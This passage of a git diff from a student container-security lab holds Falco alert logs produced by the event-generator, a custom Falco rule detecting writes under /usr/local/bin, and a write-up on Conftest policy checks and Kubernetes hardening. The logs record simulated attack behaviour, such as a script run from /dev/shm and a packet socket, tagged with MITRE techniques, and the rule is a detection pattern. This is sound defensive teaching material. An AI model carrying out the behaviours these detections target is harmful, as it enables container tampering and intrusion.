proto=3","evt.time.iso8601":1762539428378788643,"evt.type":"socket","fd.l4proto":"","fd.lport":null,"fd.name":"","fd.rport":null,"fd.type":"","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"event-generator run syscall","proc.exepath":"/bin/event-generator","proc.name":"event-generator","proc.pname":"containerd-shim","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Notice","rule":"Packet socket created in container","source":"syscall","tags":["T1557.002","container","maturity_stable","mitre_credential_access","network"],"time":"2025-11-07T18:17:08.378788643Z"} +{"hostname":"5238b209792c","output":"2025-11-07T18:17:08.483695518+0000: Warning File execution detected from /dev/shm | evt_res=SUCCESS file= proc_cwd=/ proc_pcmdline=event-generator run syscall user_loginname= group_gid=0 group_name=root evt_type=execve user=root user_uid=0 user_loginuid=-1 process=sh proc_exepath=/bin/busybox parent=event-generator command=sh -c /dev/shm/falco-event-generator-syscall-ExecutionFromDevShm-1zRpmX.sh terminal=0 exe_flags=EXE_WRITABLE|EXE_LOWER_LAYER container_id=f66ca4123505 container_name= container_image_repository= container_image_tag= k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"f66ca4123505","container.image.repository":null,"container.image.tag":null,"container.name":null,"evt.arg.flags":"EXE_WRITABLE|EXE_LOWER_LAYER","evt.res":"SUCCESS","evt.time.iso8601":1762539428483695518,"evt.type":"execve","fd.name":null,"group.gid":0,"group.name":"root","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"sh -c /dev/shm/falco-event-generator-syscall-ExecutionFromDevShm-1zRpmX.sh","proc.cwd":"/","proc.exepath":"/bin/busybox","proc.name":"sh","proc.pcmdline":"event-generator run syscall","proc.pname":"event-generator","proc.tty":0,"user.loginname":"","user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Execution from /dev/shm","source":"syscall","tags":["T1059.004","container","host","maturity_stable","mitre_execution"],"time":"2025-11-07T18:17:08.483695518Z"} +{"hostname":"5238b209792c","output":"2025-11-07T18:17:08.483991726+0000: Warning File execution detected from /dev/shm | evt_res=EACCES file= proc_cwd=/ proc_pcmdline=event-generator run syscall user_loginname= group_gid=0 group_name=root evt_type=execve user=root user_uid=0 user_loginuid=-1 process=sh proc_exepath=/bin/busybox parent=event-generator command=sh -c /dev/shm/falco-event-generator-syscall-ExecutionFromDevShm-1zRpmX.sh terminal=0 exe_flags=EXE_WRITABLE|EXE_LOWER_LAYER container_id=f66ca4123505 container_name= container_image_repository= container_image_tag= k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"f66ca4123505","container.image.repository":null,"container.image.tag":null,"container.name":null,"evt.arg.flags":"EXE_WRITABLE|EXE_LOWER_LAYER","evt.res":"EACCES","evt.time.iso8601":1762539428483991726,"evt.type":"execve","fd.name":null,"group.gid":0,"group.name":"root","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"sh -c /dev/shm/falco-event-generator-syscall-ExecutionFromDevShm-1zRpmX.sh","proc.cwd":"/","proc.exepath":"/bin/busybox","proc.name":"sh","proc.pcmdline":"event-generator run syscall","proc.pname":"event-generator","proc.tty":0,"user.loginname":"","user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Execution from /dev/shm","source":"syscall","tags":["T1059.004","container","host","maturity_stable","mitre_execution"],"time":"2025-11-07T18:17:08.483991726Z"} diff --git a/labs/lab9/falco/rules/custom-rules.yaml b/labs/lab9/falco/rules/custom-rules.yaml new file mode 100644 index 00000000..9ac72e49 --- /dev/null +++ b/labs/lab9/falco/rules/custom-rules.yaml @@ -0,0 +1,11 @@ +# Detect new writable file under /usr/local/bin inside any container +- rule: Write Binary Under UsrLocalBin + desc: Detects writes under /usr/local/bin inside any container + condition: evt.type in (open, openat, openat2, creat) and + evt.is_open_write=true and + fd.name startswith /usr/local/bin/ and + container.id != host + output: > + Falco Custom: File write in /usr/local/bin (container=%container.name user=%user.name file=%fd.name flags=%evt.arg.flags) + priority: WARNING + tags: [container, compliance, drift] diff --git a/labs/submission9.md b/labs/submission9.md new file mode 100644 index 00000000..cec69acf --- /dev/null +++ b/labs/submission9.md @@ -0,0 +1,58 @@ +# Lab 9 + +## Task 1 + +### Evidence (baseline alerts observed) +- Falco observed an interactive shell opened inside the helper container (attached terminal). +- Falco raised a custom WARNING when a process in `lab9-helper` wrote to `/usr/local/bin/drift.txt`. +- A second WARNING recorded a validation write to `/usr/local/bin/custom-rule.txt` (both writes show FD_UPPER_LAYER). + +### Custom rule purpose +- Rule: Binary W Under UsrLocalBin +- Purpose: detect creation or modification of files under `/usr/local/bin` inside containers — a common indicator of post-deployment tampering or container drift. + +### When the rule should fire +- When any container process opens/creates a file for write under `/usr/local/bin/` (open/openat/openat2/creat with write flags). + +### When the rule should NOT fire (tuning guidance) +- Exclude trusted build or management containers (by `container.image.repository` or `container.name`). +- Optionally ignore package-manager writes or root-owned maintenance processes, or lower severity/rate-limit alerts to reduce noise. + +### Quick operational notes +- Falco reloads rules from `/etc/falco/rules.d`; if a reload is needed, send SIGHUP to the Falco container. +- Validation steps used: start helper (alpine), spawn shell, perform test writes to `/usr/local/bin` and confirm rule alerts. + +### Minimal next steps / recommendations +- Add allowlists for known builders and legitimate images to reduce false positives. +- Map the rule to alerting channels and set an appropriate severity. + +## Task 2: Policy-as-Code with Conftest (Rego) + +### Policy violations from unhardened manifest +The unhardened manifest fails several critical checks that weaken runtime security: +1. `:latest` image tag — unpinned images are unpredictable and hinder reproducible, auditable deployments. +2. Missing `runAsNonRoot: true` — runs as root, increasing risk of privilege escalation and host compromise. +3. Missing `allowPrivilegeEscalation: false` — allows child processes to gain privileges beyond the parent. +4. Missing `readOnlyRootFilesystem: true` — writable root enables tampering and persistence by attackers. +5. No capability drops — retains unnecessary Linux capabilities that enlarge attack surface. +6. Missing CPU requests/limits — permits CPU exhaustion and noisy-neighbor denial-of-service. +7. Missing memory requests/limits — risk of OOM and node instability. +8. (Warn) Missing readiness/liveness probes — reduces ability to detect and recover unhealthy pods. + +### The specific hardening changes in the hardened manifest +The hardened manifest addresses the failures with these concrete changes: +- Image pinning: `bkimminich/juice-shop:v19.0.0` (replaces `:latest`). +- SecurityContext: + - `runAsNonRoot: true` (avoid root execution) + - `allowPrivilegeEscalation: false` (prevent privilege gains) + - `readOnlyRootFilesystem: true` (limit writable surface) + - `capabilities.drop: ["ALL"]` (remove extra capabilities) +- Resource limits/requests set for CPU and memory (prevents resource exhaustion and noisy neighbors). +- Readiness and liveness probes added (improves availability and automated recovery). + +These changes directly satisfy the conftest rules by removing root execution, limiting privileges, pinning images, and enforcing resource and availability controls. + +### Analysis of the Docker Compose manifest results +- `conftest-compose.txt` shows all 15 compose checks passed with no denies. +- The compose policy requires non-root user, read-only root filesystem, and `cap_drop: ["ALL"]`; the manifest meets these requirements. +- Recommendation: add `no-new-privileges` and maintain image pinning and resource constraints in compose files where supported.